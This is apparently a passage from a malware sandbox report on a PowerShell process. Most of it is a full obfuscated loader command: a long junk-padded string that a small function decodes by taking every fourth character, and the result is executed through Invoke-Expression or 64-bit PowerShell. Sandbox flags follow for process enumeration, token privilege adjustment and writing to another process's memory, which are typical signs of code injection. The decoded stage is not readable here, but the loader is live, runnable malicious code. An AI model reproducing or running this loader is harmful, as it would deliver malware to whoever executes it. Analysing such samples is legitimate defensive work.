kry'AukAJar0genBBow7ImpAHov6OveAZon7UnsAAmp0SjuBParCLytFSlo2gerFVer6Hag8Vom1RhaBCoc7CudBUnmCIntBDir6nonBPse7HulBSpa0HarAGar7AudBDyb6FetBSkl6StiBIns7ForAFem6PlaATox1RhaFRubCKlo9AntBPosBTilCforAudb4StaBbevDGorBmut9SplBFis7TraFBagAEntFPra6JigBIllCPreAKvi7AdaBmixERidBSekECasFBetEEneFYar2Tan9Udt2AmyFPanACoc8Rat9Uss8Bad1perASubBUniAdis1SudAOve6BamBEff7RepBUdgFImpFRidCNon8Bes0DroASte7AcrBHypCSilAUnt6CigBReaBSkaBSkiFBlyBRub7VidFGruCTeo9AggBSpaBTeaCCreAUvi6DieBFre7RelAEqu0SluBSepDSnoAIrr2mis8Spa1DeeBDem7UnsASke0CorAtet4RygBIndBUriBVil1ReaBCur7TrlASgs1KatFMilCOps9BouAFetBAto3diaBPalCstaBBes6StrBUprEBraBAfd7Ult8Psa0FriBPuc7PreBemb4Arg8SmuFCalFSunABes9TraCNapBStr7ChiAUnh5snoFFlaFSko9gkaDFloBlip0DigBPar8StoBPec7AfdBtra1AshANes6DusFAfs2Pen8Smo1YngABerBForACab1tilAOps6FugBsyn7ArtBFejFDyrFDupCNov8Tit0MarABed7MacBBedCudsAOri6VerBSejBAntBNetFDemBFjo7TerFVerCHal9FlaBLonBDedCOptAMet6SphBUdf7paaAInt0ProBIndDKanAdis2Ser8Myr1ProBBra7MinAVis0SigATou4reaBRudBforBDen1InvBCal7VenAVid1RykFSteCUdb9AnvASupBBre3AggBRamCUdpBViv6KonBCheEAfbBStr7Mai8erh0HusBAbs7DukBJad4SmeFSouASpoFNonAUso9SmuCMaaBPre7FejACoe5SimFGauFMun9EnsDUheBMor0BetBEks8SnoBTal7VerBRec1FloALat6pinFFib2Blo9KirBFarBdjeCSupAAfr6Par8Yng2FirADip6WatABaa0DupFPacBRetFKarEForFove2LymFTasAGenFEsk6Mae9ForFPopAErgBSkjBHalEEsuBPle6plaAVen0StiBRes7CreACha6NytBAflBSloBFej6TerBOve7BoaABra0kpsAFej1SkrFAnkCAfp9Sli5PoeBSel7MetALeo6Fri9VarFPalBRud7GraAkim6BruBIngADaaBLevDpurBAll6ForFDriAStjFBat6Ver9Dam4MilBPreDudfAUdb0DisBoutEMakBInf3ProBsta6HenBSta7CouBMarELreASor1WhiBStr7TubBtelCCorAEum1JazEMlk7TetFFleBCasFKarBBarFKorCMel9FejBWatBTeaCDybAymt4tetBPyrDRaaBHem9BagBDis7VisFUndAAnnFBad6CalBDilCAfpAMis7WinBKliEPerBCasEAptFSpoECasFMer2Pon9Rei2SubFEjeAStaFPax6FilBsvv3TotASto7knaAMam6PosBAbeDElyAAfh0MisBBudBUdsAlbe1ParBTru3MasARes6attBBesBAflBExpDOksBSubCantFUdrBIndFtanBNskFAutBundFPriBIrrFTraEAriFEft2mitFVip6Bes9youCPhyBamf3GenBPus8HanBPas7OptBtrk6SurBAfv7PalATan1PreFStrBGenFSplBMod'Lat;Pla.Slo<ranRYogaNoruDisgHethDiltPri7Hep Tra<OutPPhyhSaleUtrrGuieAfgcTotrFruaSkltLusiWakcPej1Ill;Reg}GalfTrduPsenSnocXertSeciMnboBrynCze opaSbiheYirlOvevUdsmTiloUdsrLamdEvasInsfOzooforrSkisRusgSvoeOilntokeFyn2kon3Pos Fde{StePvakaCulrHepaPyrmMac Kre(Mal[TopPudsaPharHelaUnqmEleePretDiseClorIli(GunPMasoOmdsHoliHyptHiciTunobornamp Rob=Ins Lan0Gip)Uns]Fer Kom[OdoTLsnyMacphjeeUps[Ral]Mag]Par Edw<HjeDBreiDyvvUnseSvrrBeksExtiUdifGniiForcFjeeDdsrconeEmbnOpedOpteSwasSpr,Phi[sacPPauaShorMelaArimArgeKnytBopeFilrDis(StaPPaloOttsAstiBiotPosiPuloDetnJus Sav=Sym Myc1Lyn)lud]Lif Kil[ShaTMusyGenpAfseNeo]Hak Aar<DewBMiciKidkPepaSnirFribIdioHulnvidaTretscreOvetopt Stu=Bro Hen[PheVOffoKliiValdPed]Krm)Non;Dam<KarPFrihBelefilrTureAnncCharNoraTeltLitiBevcMin2kat Dom=Him KorSSupeAfllUnbvFolmHaroBirrKamdTursNipfPlaoOrdrLaisDekgBaleCilnSemeOve0Ded Opr'DemFbib6Arg9Raf3UndBpilCSnoALed1TaaBLakBnarBSvr5AdeAMil6GraAUnd1ReiBMil1ProAAnt0HeaBFol7SkrBNedFGenBMor7ArbBPorCFigFDia2triEVenFTelFCom2Kon8Tea9Cro9hou3AnnAFal2MauABer2Ngl9Ova6KroBPseDRevBVerFAfsBIll3SorBHalBNonBActCJou8HomFDevEFis8AntEfac8Kon9Bri1LoaAAks7BetAVil0ToxAKri0BreBDet7BuiBFriCYogACla6Ben9Tan6CutBSocDStrBGobFCouBLne3FacBAndBBjeBpalCPerFKroCBro9Dia6ImpBatt7GgeBMot4DasBFemBLatBtolCmisBUim7Aph9Lum6SarABogBVegBStiCKorBMad3OveBIdiFGenBForBUfoBEft1Kin9Eks3RecAMul1EulAAns1WeeBPaw7MusBParFSniBskr0BelBregECarATilBNacFOliAExpFRevAKap9VasCNedBRee7MelAPol5ObjFFonFGen9RapDSolBDat0exuBDud8DisBUta7ComBByg1SerAOff6TunFSch2Spo8Svl1KonAResBDanAbas1BygASti6SpeBShe7PorBLgkFSikFMikCCur8Zas0HydBSpo7EerBPhl4BivBSnnESkaBEch7BrsBIow1StjASwa6FroBLysBstdBGulDuneBBliCSemFStrCOrc9Ove3UniAHar1LokAUds1SkuBIri7ChaBLipFGenBPez0VisBUdgEPilAOveBUnd9preCVitBUns3FloBOvaFTumBSup7ShaFPloABarFcar6Ann9Kro4PraBMakDDjeAOut0OveBVamEChaBund3FilBPre6NonBChe7PimBStuEVesASky1UndBBay7PerBpjvCHjdAJen1OveEOliAGroFResBSpeFBaaBChrFDetEBroFSal2Bek8bog9Rin8arm1spiATegBEveANes1DowAelz6MonBUne7graBSemFThaFbdeCSkr8Syn0VenBInf7RedBGur4DivBAnsESvaBUdr7TaxBGaz1SlaABof6AttBGarBstyBDolDImdBHanCSenFDdeCLan9ski7sanBPasFBedBgehBPorADio6PagFAdrCSkn9Ker3ForAKug1UdsANad1EvaBAng7FleBForFBryBUna0FedBMarEArbARetBFlo9Bud0DegADua7ForBSkrBDisBIntEDisBRet6RetBTor7GnaAFor0Sol9God3afsBAlb1TndBCor1ChaBInk7LitAChe1RegAOve1Wel8TriFStuEnat8EnaEUnr8Dem8Syd0csaAFil7PenBSheCComFEmiBAmaFNepCSpi9Hal6GnaBFlo7BotBNun4ComBCurBTryBSrvCbenBIns7Unn9Dis6udvATasBSavBHerCblaBBlg3UpsBBinFDamBDaaBMimBThe1Ind9TriFrecBSocDGreBStu6fraAOst7LanBNotEopgBFrs7DygFHypAlgeFReg6Fil9Bag4RovBSelDArrAfum0KolBopiEPaaBBaa3UngBDis6cosBTab7stoBUnmEstrAHex1InvBEll7ForBPowCKnaAUri1EftEKatBBiiFKugESidFFru2SteFEup6SycBLog4BleBMin3ExoBDiaEEleAFor1IndBGyn7SubFNagBindFchoCRun9End6EroBFra7LysBFor4ydeBTabBBegBSolCForBHyp7Car8Pro6KamASeaBLubAAbs2DerBBes7actFDukAQueFCop6Mac8Ins0AstBCir3CurATet7IdiBind5VinBKloASypAEli6ClaEBis2PhyFAabESurFLuf2MarFSpe6Pyr8Ant0KamBNyc3KorABom7theBGri5VolBMusAKngATem6SouEKom3KahFGraEslnFNig2Cur8bos9Brd8Sla1ZesAIndBAngAfor1HjeAOpv6SolBSma7AcaBpolFUnrFRadCSit9PreFPomAMam7TolBFraEDefAKue6AksBKorBEmiBPri1UniBOwn3FreAAdg1HayACat6Unr9Str6EdvBUna7KogBUnkESokBHal7GalBAfg5PosBDot3CorAAug6IndBOkt7Bet8GraFUgeFTraBFac'Ans;Che.Mon<BagRVenaMomuHingBushAertSti7Arc Fol<HyoPSachCateDemrGodeAfscBorrColaafstSusiRyncGue2Non;Hae<MetPImphIndeBlorRapeHorcVelrProaUndtskiiSolcZym3Pol Whe=Sub samSInaeArilStavDdsmSkaoGuarsprdVarsPsefHeloUnarFrssBrygKameBlinPeneSen0San Duk'betFCla6Eta9Vac3strBConCForAMel1LokBWarBFysBGod5VaaAPok6PosAPre1LerBRus1EjeApse0AfkBSko7chaBPotFZarBFor7PisBBarCImpFhepCAfs9Teg6OlaBChi7resBSta4MonBBenBHocBButCMusBLiq7Skr9Spi1NepBObjDGieBFidCOrdAJag1SvaABoo6KrkAFul0KapAEne7IrrBEle1CreACus6AppBAftDButAChr0LovFDiaABabFPre6Qui9Nuk4MedBClaDMorAOps0HawBEumERidBLib3OprBSki6GuiBSch7DenBMusEOmbAHus1AmaBBer7SamBCowCDivAdeg1criELea4ManFCamETopFApo2Tim8Rds9Hre8sko1UdlADamBTekALim1PasABan6InsBHat7subBFelFTagFTurCSpo8Ser0JetBPro7LdnBDis4EndBParEsysBCar7RedBBys1SkuACla6PelBproBKlaBSpeDFdrBCamCLeoFRusCSel9Cam1TryBLej3OslBpikELymBCraEApiBnonBgenBSpiCCloBSin5Fre9Byg1IntBForDLeoBDusCSomAHyt4VenBFra7sceBMalCHaaAKon6AntBLinBSofBGadDColBCriCOboABlo1For8ManFPasEFil8FysEMys8Mis8Neg1PreAIne6SenBSmi3HorBCouCPraBKla6albBKar3UnwADri0InsBMgf6BraFHemEOpdFFre2FelFExc6Fod9Cel6SunBSiaBKonAWha4SanBLai7TvrATru0SviASec1BloBGasBStaBtin4HonBImpBSonBopt1BarBHom7ToeAPaa0ScyBFly7spyBinkCDriBrot6LanBKoe7PreAinv1KiwFForBMelFDatCsmu8Ing1RalBfej7BolASam6Rso9LagBJorBOpsFMikAMes2stuBWraELedBKom7TriBCalFHovBudf7ScaBRegCRaaAFel6SpeBPup3ShiAcer6AzoBPlaBPorBDriDTykBForCPol9Pap4SeeBArtEKunBaft3FyrBFlu5GodASky1HinFKefAStrFFej6Kuv9Sip4EksBBeaDMigASli0ResBPetEDepBThi3ReaBBer6SphBUrt7XylBbogEImpAnon1SpiBFil7UdkBMicCKalADoe1RenEKra5BidFDieByes'Bun;Mis.Tan<UnsRdisaUdduHougJushAkktDid7Con Del<DilPBiehDimeCaprPreeDiscCosrOveaFlatEukiFolcPri3Gal;Kor<UltPcenhKoleBilrveleOnocNedrUnraHyptBruiElicLjt4Uho For=til HorSBuleUbelUdhvRetmGodoJonrBrndBudsstofinfoResrGersAntgDideImpnSpreJus0Coc Ste'TviFSig6Pla9Hon3TekBGotCMsgAGas1TasBKofBvalBund5ArkARoo6LanAFor1yndBEno1WroAUnd0OveBBac7FavBEneFDarBRal7ArcBLinCSamFEneCSte9byg6InaBRet7LenBSub4OveBVelBSpaBPorCUniBPne7Tar9IndFMosBLie7RadACza6SelBRudAInsBAnoDBurBAlv6croFTraATutFLys6tra8Bal0PalBMil3DerAPeo7LupBOrp5SniBBakARecAUdm6KafERet0TosFDynEcurFFig2MinFFes6Fly8Spr0HurBGru3AviABor7styBSoc5AfaBRekAErtADom6TouEbas1SmuFSgnEUreFPal2GonFHib6Inw9Whi0AfsBPsyBPagBAct9BioBLiv3ComAArc0AfvBLyk0BunBSamDTriBPreCOmsBSge3KonATha6NonBAfl7UdeAFot6psyFImpEtweFPub2MilFuni6dec9Neo6ExtBSkrBEdgARhi4feaBRen7TilASal0BevAMan1KanBnecBCocBDal4ElaBPreBfilBVic1ForBLis7OpsAMin0DigBEnd7EliBareCMorBSwi6DicBPer7LigASte1AnlFInfBDisFLasCAna8Ove1CobBHem7MedAPos6Vol9OveBRetBEksFAerAThu2DreBEleEForBnyc7EveBForFCatBPro7LivBhyrCBedAOpp6IndBRhi3parAOpb6CisBDelBLedBMisDHatBReeCKol9Asy4UafBGenEFllBImp3FriBTrk5UzbAHol1SurFBudABanFSnk6Uru9Eji4KalBAppDAudACel0PanBFylEUndBLea3ignBKul6FedBSka7UdhBUmpEPilAPlu1SerBSkf7HarBXanCOveAStu1resEVin5UdgFHypBUde'Mai;Gla.Log<AnlRAffaUrbuDehgsemhOvetBoa7Non Far<MinPsemhrugeRevrOffeKapcEnirFinaSentTaaiBipcAnd4Imp;Skn<unaPSelhSoaeSkorInteUngcAjorMilaGaztEftiDescHel5pro Udb=Rve LigSBaseNumlFibvRegmStaoPrirUdgdLogsUnsfSekoCurrconsRnigPreeDosnToteVen0Ste mal'BarAPer0RevBfor7StrAPar6carAVen7KonAPre0ranBCenCAktFOve2SpeFPar6Nid9Lab3SeaBPseCSemApas1LejBBoaBOveBLyc5magAFor6HypAfre1ProBMix1LysAVrd0TidBHal7AfbBFreFMinBDat7SliBsatCMavFbygCIct9Ind1ReiABol0hovBMer7SleBDro3stlAMon6KetBPar7trk8Slr6ForAsalBHarATil2NatBTit7arrFJorAUdpFKorBMon'Bib;Syg.Mas<PulRMomaMgeuBrigAgahEditdie7Dva Alb<DibPErhhUdeeposrPakeMorcSkurSieaRemtCloiRescUnd5Whi Hum ret Lar;Arb}Liv<AftSFortSilaPhabenaeReijPodsSkueCourAlt Tre=Red mdeSUnseSnrlBekvPlamTakoEmhraabdHersstefrgsoDyrrVigsRotgPhaeIndnepoeCou0Can Pha'PreBIns9AnaBUni7ArkAKom0KheBanoCProBVug7VinBIntEBacEAbd1UntESam0Uds'Agl;Bos<QuiPStohBrieBlorKageGricFeirDeeaNeetForiGascEne6The Dil=Rhy RekSNagePerlPenvBormFjeoSverBladBorsHemfForoBetrSansKolgfabeFrangodeSub0Mou teg'DecFFar6Jag9FirESluBGryDSkaBElk1OrpBTol3InsAEnc6BrnBFjeBDowBFraCTrsBPal5DelFUnc2LokEOveFCamFRif2Sti8Mal9Hei8Rod1KreALikBEleACan1uliADuo6DedBInd7HigBExtFPedFValCBrd8pat0FarALit7looBEmbCautAPar6AffBTakBIroBAriFDelBInd7VipFmusCcru9UndBAscBFraCBlaAHvi6PetBVic7UndAVid0UteBAccDKolAKna2Smr8Imp1NonBNon7SheAKed0MoeACon4BraBUnsBJewBDet1SupBLed7AdgAfel1SupFMagCRaa9DarFArbBCen3PhyARac0ComAEuh1PeeBPhiAMalBApp3RouBMisEwar8AfmFVerEDom8GenETri8Spi9Sti5AnsBant7EksAVel6Bls9Unc6telBWha7AbrBIntECirBUdv7MacBFor5DetBNap3SunAhov6BriBVas7Fal9Daa4SkaBOpfDSteAMat0Onf9Nyh4intAErs7LovBPrvCProBFej1AcrAPet6InfBLonBVerBMorDcalBPreCUns8Zan2BraBAquDEksBBadBAutBAflCSneADet6LouBFej7ImpADel0MesFTvaAMarFPriASab8Kva1ScuBSlu7DisBApsErahAMox4BruBSloFSvvBRanDFliABra0DelBInv6ChaAJen1DviBVen4HepBSkuDBesARys0FasAUsl1HalBInd5UdrBCar7IllBSerCConBOmf7ArbESta0CarEmis0UdpFInt2DiaFKur6Cla8Lap1KhoAInd6PhlBsub3FinBTal0KriBInd7BehBOpt8KbeASna1BumBNan7MisARaa0CleFLef2TemFOpr6Cac8Res0CarBVld3SysAVac7graBUnc5PlaBIntASplAmyr6SjuEBra6CinFSkaBHypFProEUndFBeh2MimFCinADat8Ren1FriBGil7BaaBTotEhavACra4EmbBPapFUdlBMisDNonAbeu0EmbBQui6LugAOoz1TegBSyl4MrbBEjeDtllAGra0DunAOph1TrkBByn5floBile7SenBComCGreBSen7OutESee0staEBef1GoaFGol2Rim9Mel2waxFManAFin8Ops9Mes9BekBExcBHerCResAHaa6Jov8Bes2KerAUne6FrnAFae0Gui8CopFKloFFluENriFTer2Sta8Kon9ind8Ste7Sta9YawBMarBUnaCAceASam6EnfETre1EstEOwe0Und8CooFinkFIdiEpalFInd2Bag8urg9Fyr8Emn7kob9WesBUnrBNotCLanADec6LysEPrv1VolEUdv0Sek8DruFFysFUkvEspeFTac2Ove8Kva9pse8Sup7ape9HarBkonBbanChalAStr6TotEUdb1DocEGes0Rec8TjrFStaFVarBOh FImp2SanFfabAska8Sam9Dur9KlaBChlBHorCBdeAGam6Ove8Ate2OtoAudg6GenACoo0Abr8cisFArdFMagBmodFSitBRivFVarBUdv'Sli;Mid.sou<StrRPdpaPeruHargSubhAnatChi7Sge Cut<PolPSmehPateFlirJaseSpacRenrWhiaBuftDupiBlacGvi6til;Tow<LetPPurlMesaPumdGrisFrahAllomodlinddBasePosrDizedersOrs Que=ist PhoSKomeFodlBrovHepmSpioBenrSemdSkrsElufPrioSlarBoasPavgToreIdhnHydeVap2Hea2Aut Alf<LyoRHouaAntubetgPorhEdgtKom5Syr Int<ReiRKonaRasuMargNdshChatUbj6Bin;Pac<vsePGenhAtheNierCareProcScrrArbaGantFejiLeccGua7Sky Ana=Wro PsiSBydeNumlhomvSpemKasoErsrOradMarsCoafOveoNatrUnhsarcgSkreCarnNoneKam0Lok God'GamFSkr6car9InnEiagBUre7HasATil4KulBReg7TypBSmk6UloASnuBLauBPic5KhaATal6DunBPerBAgoBHyd5DelAKan1PreAAmy6MisBMor7CanANon1DatEBai3OveEPsa6BruERun6KatERej1LadFRun2UbeEOveFFulFTeg2EquFsla6Uaa9KnaETinBrecDDinBKog1UndBTok3pliAAmo6KejBsteBBraBhjrCArmBTra5totFExpCAdv9FerBAcaBBlaCExoAHya4BreBMugDHumBUnv9FooBfig7DioFTroANar8Rar9Suc9genBSkuBAudCgenAPro6Ind8Cou2RotAKvo6AucASty0Str8InvFOveEEnc8SluEHni8Yme8Abo8indBSvn7WeeAZoo0StiBrudDHenFdemEOxyFNor2PatEAnt4NulEAbo6AldEOrm7TriFNinEMetFFri2SalEGri2VokATorAMutEPri1phiEStj2TrgEsal2TetEPos2UfoFLseEOvuFPee2ChrEver2GenAUdsAFraEIna6AfgEDia2HeaFBipBPol'Fin;Gen.Kla<MolRRavaWeluHangKanhLeftCor7Spo Vse<apoPsubhheseRegrPareObecFusrSliaUdptResimercInt7Tra;Cav<TerPEkkhTileAndrFraeAfvcSumrMixaTyrtImpiTyrcAcc8Dgg all=Non MaiSKokeSnalAtrvDecmSluoStjrSvkdSkasCemfstiosolrOutsUltgTrieEnvnYideMul0Pla Dis'MasFAnn6Son8Out2antBkvaADouBAlgDRygBNuaCHviBMed7TriASnaBstaAEne1ColFRek2SurEJdeFimpFIng2sunFFor6Uni9SmrETraBHerDTolBLan1VinBBog3AnoASki6AbuBUndBSepBDubCBidBClu5MbeFKnaCUnl9JagBIntBTomCbefAung4MesBKonDfluBTer9trnBDag7UnpFStoASte8car9Afg9strBOmmBYauCUnrAIll6Pra8Una2PreAMis6FejACon0Han8SulFStaEBeh8OveERet8Ove8Tra8hypBSki7ArcANed0HilBComDReiFDksEConFEnc2DraEHer5CheEKun0HvlEGen1domENskALymEtre6NonEIhu7IndEUns3ColEOkk0TobFMarESteFAnt2PdeEpos2EvoAUnsAungEBol1NicECoa2apsEUpr2DedEBug2CanFCytEAnsFPla2OctEEns2PaaARumATamEPit6BukFindBFad'Kon;Til.Uti<kurRAdfaFlauAltgAnthsvatSst7Top Ele<TraPSelhGroeSyrrAdfeEmecMarrNskaNontreniAppcFor8Oms;Arc<ForBAfgrStoeMedkAdekEvoeTrerThr6Hyd3Udb=Tel(klyGMeneDomtPre-IndIHyptTrbeHefmPsaPDuerPluogalpArbeUhlrWautBloyThg Jaw-bevPFrsaHyptArbhSoc dec'MgbHkurKAnkCDisUTim:Adv\FrkENonnSageskabEntabakrVinnArcsJew\BolwsemrAviiskotCoshSjleTjedPha'Und)Joc.GraASatnTrffGenrLabeBibdSon;Med<NitPMushSpieRaarVireShacArbrRevadiotSpriBalcXer9Har Pli=Sem FraSUdleSlylUppvPurmLatoKvarHerdBrusRevfCenoSorrNedsSvagPlaeRacnAsieSki0Opr Spi'BoaFFor6Min8ind2anlBgraAunmBHel7OpiAFid0ForBSta7VenBUdl1HorAUnc0ProBpet3MisAAlo6DisBParBSyrBTah1PolFPas2DerEUriFtilFHje2Gen8Syn9Tnd8Tor1PasAHusBNorAAlu1SejASpa6CavBsma7UndBHovFteeFSpdCKat9Lag1ForBJoyDOutBPolCRelAHar4AvnBBas7GorABla0ScrABrd6Kre8AirFVerEInv8HorEEft8Eks9Com4natAMic0ThyBGodDtrnBPakFCol9Raa0SkiBSyn3DagAKom1behBPro7UndECap4hepEPag6Svi8Fib1TheABrd6TanASlj0ForBSanBKbsBstuCDraBPar5MajFDrgADisFUng6Off9Afd0OutAOve0MetBLoc7ForBPly9SejBArb9BacBUnb7ExcAIns0RubEUns4SnoESno1FagFFriBKre'ind;Led.Sla<staRSpeaNonuVingBathLantAma7Tro Meg<IdiPTrihRaveRedrStoeCrocUnorAvoaTertTuriPrecMor9Hyp;Ald<hvaBNeurRefeblakSinkBroeKinrLik6Gen3Bnh0Eur Mil=Tun TakSSweeMyclBarvNonmUunoOrdrBladkulsSubfTogoDoerMacsSpigStaeSnynNoneRes0Mel Tro'Kld8Pre9Wat8Una1chiAReeBUndATra1BlaASke6LamBSst7UnsBPriFForFBewCTot8For0GnaATet7PaaBLowCHibAIde6udsBBrnBNonBFilFGarBSev7TriFSlgCSjl9ProBAbrBAcqCsubARam6MdeBDro7acoASir0TapBWorDOveATri2Mus8Kns1TabBInc7AluAWre0GriAHok4PolBurfBnonBWoo1UnsBSte7DieAThe1KomFWorCSlb9TraFstyBLof3ScaAFor0AniATnk1AdcBMinAStiBSkr3UltBBriEMor8SenFSedESem8MatESam8Uds9Une1CatBTriDFllABol2kugAKanBWorFMeaAAcoFTee6Fas8Com2FarBPreAttsBDra7BraAMil0PerBFra7VegBRep1SemAich0OpsBBer3BitAPre6BloBLogBFarBBnk1TamFBarEStuFHyg2ArmESen2AboFSmuECauFHun2BegFOve2ThuFCir6ude9TotEudsBace7hylAWal4GinBCal7ComBDag6NabADrnBEksBTil5HerAAft6SovBTsaBrevBgru5LicAFis1micANil6KreBPhe7FriAadv1YatEMis3SteEEpi6UppEFrd6UndELil1NonFAflEMusFMac2RaiEBox4PsyEIbr6MunEGro7DemFBygBTri'Des;Sup.Klo<PirRSpuaufouOxigNeuhMettTal7Cal Eve<UreBBarrHuleTalkSlakSkveAulrKog6Rus3Bec0Taa;Lit<SchUantnDondTjeeRekrMunmUdleKonsBldtKkueDalrToeeDatnSkr=Skr<FriPChohDeveDisrMiseEskcDusreftaPritKeniTercCal.HelcAscoBaruTranUegtLan-Fem6Fem4Afl5pos;Rap<LorBSparFulePlakGujkPolesewrSpo6Ska3Mem1Non Imp=Liw antSProeMarlPorvBrumAusoMalrRondUnisredfIncoMadrRotsMglgEkseChenVaaeMid0Oca Opf'Ple8Hor9Sol8Dei1NucAPeiBLebAIns1BogAbat6HeaBVlg7BriBOisFSemFSorCDep8Sky0KomARet7KonBJeaCAfrAPle6AceBRegBToxBPicFBedBOve7IndFPreCWal9UdvBSpiBExtCkonATrn6ImpBPop7RulABet0MasBGanDAboAUdp2Rud8One1PonBIso7TolALau0DisAHah4BenBFedBBulBOpe1MalBPro7OveAAfb1FosFAmaCGau9SprFAfdBUlt3afkAVis0KonALen1UnpBCymAOptBKao3StoBAnnEKon8TotFSteEVen8CypEPen8Meg9Orl1PirBUncDTalACer2tilAAppBSolFtraAchaFvri6Sou8Ram2PseBBeaASteBHel7RdsANon0SinBFis7BisBDis1QuaABuf0TegBEng3RouABes6PadBUigBTjeBSpe1CytFSalEVanFVaf2DuoETam4RenEKoa6HouEgif7OveFRemEHegFSnu2CciFHyd6Squ8Iso2OveBNarAFooBFosDTraBLunCLanBKon7BogAAfsBSynAVar1StuFKolELsrFSup2UndFFal6Tai8ove7NeeBForCForBRax6ScaBShi7AphAOti0GalBKonFBimBHyp7AskAspr1SpaAFea6DriBBow7MasAGam0ForBFil7FlaBEksCMydFKseBDen'arr;Skj.Spr<HonRYpeaexoufibgFurhQuitQui7Gen Und<IroBstrrUopeAnokHelkoveeRearSul6Ant3Sel1Age;Air<UddBFulrFaaeGuskHemkskyeAmyrRve6Ple3Hem2Nrm Hoi=bnk JogSBileSkalSanvHysmDisoRnkrMyxdSilsActfForoTerrSomsFirgLaneDennUnvebes0Coe Mot'DisFPat6Sin9Sam4OveBsusEFroBInd3RunAAfs6DraBRehFMocBTwa7PonBTraCPowFHat2ConEOceFFusFSlv2Spa8lie9Ver8Pil1OrgAFimBHaaACal1PloAToe6cyaBPoi7SigBPacFMytFcomCBre8Cly0ThaARep7ProBSteCshiASpi6sirBFedBSodBGadFPopBPod7CusFGytCFlu9AncBCabBMdrCBelAPep6BolBBas7hypAFas0GadBTetDskoATel2mom8Any1UnpBHel7KonAFod0pelADis4spoBGarBRrlBShi1ReiBBek7SobASta1UnvFRegCSsu9ChlFFolBUnd3AfkAKnu0HjeAton1RegBOveAAftBAll3PlsBSanEmel8GalFOveEJam8FolEind8Nat9gla5ChaBtit7SamALys6Bem9Tri6TveBFre7ReuBFerEMasBKap7NonBYau5OrdBAge3GreAHre6ComBCus7Gyr9rin4ShoBFreDDotAUds0Pui9fir4UopAIns7TonBBusCKokBWas1SubAUnc6HjeBRifBCulBAkkDfilBSkyCTax8Hyd2BarBDysDfinBIrrBBogBLemCChlAFis6ObcBDae7VarAUsy0BogFKnuAMyeFMegAAfl8Kon1NumBTee7UpaBAmpEAntAUnl4TanBForFOveBVraDLodAAar0OpsBUnt6LetAWav1VagBAkr4FliBMutDNedABes0BloAFly1PyeBPim5nonBPro7ScoBvelCRelBKal7DasEEro0CalElek0SwiFDet2LowFHel6Man9Gra3EnsBCom6PeaBBer6NarBbelBMusBRdt1VenAHei6SkiBAdoBRivBGraDDiaBTaaCRugFUne2BeeFHan6Jur9Sli0OxyBUnf7GutBres3KarAOxy7LacAVid6TruBSh BCudBFli4VidBForBgamBOmp7ariAHel0PreAliv1omsFUdmBAsyFSmyEUdsFmde2befFPriASli8Afs1IndBMis7CoaBVarEMonAMal4DemBshoFSkaBMisDUnoACen0BorBEks6AdrAUnw1SbrBUpb4OblBSkiDMenASup0MotAMar1ansBDem5FodBHas7SjiBPhoCCouBmit7ArtEFor0EntEAut1FedFUnv2Lit9Man2BemFSinABlo8Cla9Jun9PerBAniBhurCColAuns6Gas8kli2LovAAcu6GlaARep0Mak8PreFTraFAneEfinFfig2Rep8dan9Bag9AntBFulBUnsCUneATai6Enc8Odo2sonAReg6TarAJag0rgt8DelFValFArbEMorFNyv2Ret8Aff9Unf9PavBNavBKarCRheAGiv6Non8Sla2SonASur6BreAKal0Zoo8SexFHovFNonEetyFred2Mrk8Lam9Unw9SysBSilBPunCCouAude6Cou8Fre2StrAant6MadADom0Mul8KluFDerFfraETilFRed2Abs8Rac9Rai9IndBMisBGarCKnsALiv6Ant8Acr2BloAPol6DroABog0Dkk8UnoFFolFCleBVanFUna2HypFMenAKon8Con9Var9selBMytBUpsCIndAMen6Imp8Acm2YdeAMid6IdiAUdl0Rec8GasFAraFslaBSubFPerBColFStuBkam'Are;Rep&Fri(Eth<RoeRGanaReduWargUshhaddtTit7Non)Inv Cou<baiBColrTraeOffkMatkJereSafrUni6Maj3Iso2Tam;Shi<SoeBStortreePolkSpokSameZinrVri6usd3For3Rve God=Inf udvSCoreGrdlFilvAfbmTetoRaarBesdPensSeafDrooHegrSavsSwegScrePennbaceInd0Eri pol'BloFNon6Obs9Unw4MelBSvaEIncBPoe3TilASna6ForBAvgFConBFor7HutBUndCPreFVarCRef9SauBbroBSynCIndADen4ForBSv DNonBSia9FolBTas7PreFMatADomFBin6pra9JorEUnsBBlu7MakAora4SliBPro7PakBDor6FusAVasBPsyBOve5NylABas6SumBFifBZerBagi5AftAArr1OpbAUdf6WahBBlo7GarAFar1FarEHom3ChuESyr6SpiECli6TarEAnt1BroFStaEFilFRum6Sol8ten2OutBSitASynBTerDKnaBDizCTerBMat7SarARudBAanAAnt1HagFJorEInvFNon6Bon8Blo2ChuBPenEEyrBPro3OmnBSte6KipANym1resBPerARaiBDagDWilBNonEPasBTok6PreBMax7ExoARel0OveBMed7SurATil1KarFUndETeeESkr2FolFMasEIndEDom2KnuFFeaBBra'Res;Psa&Occ(Bis<ArbRSpiaKopuPaggIndhMestAff7Exe)Kul Smo<FalBEmurNeueKkkkKilkPhaeAggrNon6Fol3Try3Rad#Tal;""";Function Brekker639 { param([String]$Hookaroon); For($Bedstemdre=3; $Bedstemdre -lt $Hookaroon.Length-1; $Bedstemdre+=(3+1)){ $Gjaldendes='subs'+'tring'; $Selvmordsforsgene = $Selvmordsforsgene + $Hookaroon.$Gjaldendes.Invoke($Bedstemdre, 1); } $Selvmordsforsgene;}$Cranemen0 = Brekker639 'FarIFarESkaXFoy ';$Cranemen1= Brekker639 $Tjringernes;$Cranemen1=$Cranemen1.replace('<','$');$Cranemen1=$Cranemen1.replace('>','"""');if([IntPtr]::size -eq 8){ .$env:windir\S*64\W*Power*\v1.0\*ll.exe $Cranemen1 ;}else{ & ($Cranemen0) $Cranemen1;}"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4144

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
